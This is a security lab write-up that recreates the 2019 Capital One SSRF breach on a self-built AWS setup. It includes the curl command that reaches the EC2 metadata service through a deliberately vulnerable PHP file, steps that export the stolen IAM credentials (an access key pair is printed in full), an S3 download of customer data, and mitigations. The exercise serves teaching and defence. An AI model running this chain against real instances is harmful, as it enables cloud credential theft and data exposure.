This lab demonstrates an attack based on the SSRF (Server-Side Request Forgery) vulnerability, which can be used to steal AWS credentials from an Amazon EC2 instance and further access sensitive data in S3 buckets. The goal is to understand the potential impact of SSRF vulnerabilities in cloud environments and explore best practices for securing cloud infrastructure.
In this lab, we simulate a real-world scenario, 2019 Capital One data breach, where an attacker exploits a misconfigured web application on an EC2 instance. The vulnerable application allows the attacker to access the EC2 metadata service, retrieve IAM credentials, and subsequently gain unauthorized access to an S3 bucket. By performing this lab, we learn how simple misconfigurations can lead to serious security breaches in cloud environments.
- An AWS user account with appropriate permissions.
- IAM user with permissions to create and manage resources.
- An EC2 instance running on AWS.
- A VPC to host the EC2 instance.
- An S3 bucket to store and access data.
- The EC2 instance must be accessible via the public internet.
-
📂 Clone the Repository: Clone the repository that contains the necessary configuration files.
git clone https://github.com/jasonYuRong/2019-AWS-Data-Breach-Demo.git
-
📁 Navigate to the Directory: Change into the cloned repository directory.
cd 2019-AWS-Data-Breach-Demo -
🚀 Apply Terraform Configuration: Use Terraform to set up the EC2 instance with the required configurations. This will automatically deploy Apache HTTP server and the vulnerable
ssrf.phpfile.terraform apply
Follow the prompts to approve the infrastructure changes. Terraform will create the EC2 instance along with the necessary configurations, including deploying Apache and the
ssrf.phpscript.
🌿 What is Terraform? Terraform is an open-source infrastructure as code (IaC) tool created by HashiCorp. It allows you to define and provision data center infrastructure using a high-level configuration language. Terraform can manage resources across a wide range of providers, such as AWS, Azure, and Google Cloud, making it a powerful tool for automating cloud infrastructure setup and scaling. In this lab, we use Terraform to quickly deploy the required AWS infrastructure, including EC2, VPC, S3 and IAM.
The main goal of this lab is to gain unauthorized access to the S3 bucket by exploiting the SSRF vulnerability. Specifically, you will access the EC2 metadata service, obtain temporary AWS credentials, and use those credentials to retrieve an object from the S3 bucket.
The Terraform script has already set up Apache HTTP server and deployed a vulnerable PHP file ssrf.php on your EC2 instance. This file allows an attacker to exploit SSRF to access resources that should not be accessible externally, such as the EC2 metadata service.
Make sure you have an AWS EC2 instance running with the following attributes:
- Public IP: A public IP address is assigned so it can be accessed from the internet.
- IAM Role: Configured with an IAM role (
ec2_role) that has permissions to access S3 for the demo. - Ensure that the HTTP server is running and accessible via the public IP of your EC2 instance.
Now you can exploit the SSRF vulnerability to get the IAM role credentials from the EC2 metadata service.
Run the following curl command:
curl http://<EC2_public_ip>/ssrf.php?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/ec2_role<EC2_public_ip>: Replace with your EC2 public IP.169.254.169.254: This is the IP address of the AWS EC2 metadata service, which is only accessible from within the instance.
After running the above curl command, you should see the temporary credentials for the IAM role, which include:
AWS_ACCESS_KEY_IDAWS_SECRET_ACCESS_KEYAWS_SESSION_TOKEN
Next, set these credentials as environment variables to use AWS CLI for further operations. For example:
export AWS_ACCESS_KEY_ID="ASIAZDZTCACO7BAZ7KEE"
export AWS_SECRET_ACCESS_KEY="S7z6biyOscdzDEVuLLLXa0GwHYRdN89ivkMy/4Dz"
export AWS_SESSION_TOKEN="IQoJb3JpZ2luX2VjEFYaCXV..."
Using the credentials set in the previous step, you can now use AWS CLI to access the specified S3 bucket.
For example, download a file from the S3 bucket:
aws s3 cp s3://jhu-en-650-603/customer.json - | cat
This command downloads the customer.json file from the S3 bucket and displays its contents in the terminal.
At this point, we have successfully exploited an SSRF vulnerability in the EC2 instance to access the metadata service and used the retrieved credentials to access sensitive data in S3.
-
🚫 Restrict Metadata Access:
- Use
Instance Metadata Service v2 (IMDSv2)to enhance security and prevent simple HTTP requests from accessing metadata. - In the instance's Terraform configuration, enforce IMDSv2 by setting:
metadata_options { http_tokens = "required" http_put_response_hop_limit = 1 }
- Use
-
🔑 Principle of Least Privilege:
- The IAM role assigned to the EC2 instance should follow the principle of least privilege, granting only the necessary S3 permissions to avoid over-privileged access.
-
🛡️ Web Application Firewall (WAF):
- Use a WAF to prevent SSRF attacks. WAFs can effectively block malicious requests to your web application.
-
📝 Code Auditing and Input Validation:
- Ensure proper validation of user inputs to avoid directly using user input as part of a URL request.